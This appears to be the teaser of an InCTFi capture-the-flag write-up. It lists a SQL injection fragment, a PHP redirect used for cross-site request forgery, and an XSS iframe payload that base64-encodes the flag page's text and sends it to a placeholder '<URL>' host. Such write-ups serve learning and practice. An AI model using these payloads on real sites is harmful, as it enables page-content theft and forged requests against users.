tl;dr

  • SQLi - lcase('inKypinKy')id from dual
  • Creating User - header("location:http://web/user.php?session=1111-22222-1234&sub=submit");
  • Retrieving Flag - header("location:http://web/flag.php?session=<iframe id="a" src="http://web/flag.php?session=1111-22222-1234&sub=submit" onload=window.location="<URL>?"+btoa(document.getElementById('a').contentWindow.document.body.innerText)>&sub=submit")
Read More
InCTFi XSS CSRF SQLi docker-ssrf